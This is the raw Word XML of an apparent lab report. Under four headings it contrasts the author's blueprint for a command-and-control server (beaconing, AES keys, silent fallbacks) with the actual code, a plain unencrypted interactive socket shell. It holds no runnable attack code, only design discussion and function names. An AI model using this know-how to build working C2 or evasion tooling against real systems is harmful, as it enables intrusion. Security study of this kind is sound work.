          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BB413B" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Heading 1: Command Execution Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83BB36" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00F249CC" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">My </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pseudocode Blueprint Design:</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture mapped an automated transaction flow utilizing a centralized database queue lookup mechanism ('Check the database for any queued commands for this specific client ID').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72322D4B" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEEFC14" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actual Code Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The script runs an interactive, operator-driven text stream handler ('shellsender') that actively blocks thread processing using the '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>"")' function, waiting on a human actor to type and send instructions over an open socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E8AE4E" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C22EBA" w14:textId="77609988" w:rsidR="006E1B12" w:rsidRPr="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architectural Alignment &amp; Variance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD685A" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> blueprint specifies an asynchronous or batch tasking methodology suited for web-based communications. The actual implementation instead establishes a synchronous, direct command-line interface framework identical to classic remote administration tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D7DC4" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2540A2" w14:textId="7C22614C" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F877B8C" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Heading 2: Client-Server Communication Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC507F7" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pseudocode Blueprint Design:</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Designed as a standard beacon configuration, establishing short-lived transactional handshakes where an agent checks in, exchanges structured packets, and drops out ('Close the connection safely and wait for the next client').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6347A1FB" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080CCCC2" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actual Code Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The actual codebase uses a long-lived, persistent connection paradigm via '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>s.accept</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>()'. This single socket handle is cached and held wide open indefinitely, multiplexing continuous structural inputs and outputs sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD729F" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9B8BDE" w14:textId="3F10F17B" w:rsidR="006E1B12" w:rsidRPr="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architectural Alignment &amp; Variance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This represents a structural pivot from a multi-transactional HTTP-style framework to a raw TCP interactive control pipeline, trading network stealth for full-duplex session continuity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C733F" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D3979E" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39518D9A" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Heading 3: Security &amp; Data Integrity Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04067ED4" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pseudocode Blueprint Design:</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Documented strict security guardrails requiring a Pre-Shared Key (AES) configuration, payload authenticity parsing, and secure wrapper validation routines to aggressively disconnect malicious probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8628B9" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7ACDB" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actual Code Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The script possesses a complete absence of cryptographic protocols. Byte sequences are ingested directly via '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>conn.recv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">(1)' and dynamically converted to basic ASCII/UTF-8 strings using raw system strings via </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>'.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>()'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EDD46" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B23181" w14:textId="16FE38D9" w:rsidR="006E1B12" w:rsidRPr="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architectural Alignment &amp; Variance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD685A" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> blueprint provides strong protection against sniffing and manipulation, whereas the real code is vulnerable to deep packet inspection, highlighting a major discrepancy in defensive posturing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC51367" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38292D8C" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3721CC33" w14:textId="77777777" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Heading 4: Error Handling and Resiliency Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C5998" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pseudocode Blueprint Design:</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specified intelligent client-side fallback handling instructions emphasizing system durability and silent exceptions ('If connection fails... silently log... Do not crash').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A84B4A9" w14:textId="77777777" w:rsidR="0093698E" w:rsidRPr="0093698E" w:rsidRDefault="0093698E" w:rsidP="0093698E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8330CF" w14:textId="54520B34" w:rsidR="00FD685A" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actual Code Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server relies on aggressive, immediate termination routines inside the exception blocks. Encountering any structural network error or dropped connection sequence commands an absolute process slaughter via '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>._exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>0)'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56017D2B" w14:textId="77777777" w:rsidR="00FD685A" w:rsidRPr="00FD685A" w:rsidRDefault="00FD685A" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A38C0F" w14:textId="58540BDE" w:rsidR="006E1B12" w:rsidRDefault="00000000" w:rsidP="00FD685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architectural Alignment &amp; Variance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD685A" w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">My </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD685A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>design emphasizes reliable system persistence, whereas the actual lab asset enforces a brittle fail-closed state that fully terminates the command server program upon network anomalies.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E1B1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6660F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE4091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0E72AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="727C88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F63445"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF626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B4F68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAD421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454860">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1395348171">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="780802212">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1258753422">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1415011330">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1325473108">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1336615776">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2003771376">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="856775633">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1460756944">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2004238868">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1466653603">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="4712915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1B80"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00420A7A"/>
    <w:rsid w:val="006E1B12"/>
    <w:rsid w:val="008D0FA6"/>
    <w:rsid w:val="008F44A0"/>
    <w:rsid w:val="0093698E"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C65186"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CC5678"/>
    <w:rsid w:val="00DA6973"/>
    <w:rsid w:val="00F249CC"/>
    <w:rsid w:val="00F51B7B"/>
    <w:rsid w:val="00FC693F"/>
    <w:rsid w:val="00FD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C637B4"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{EAC0C8B6-F796-4222-AD93-48C8BC582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1436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Promise Beshel</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-19T01:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-19T01:39:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>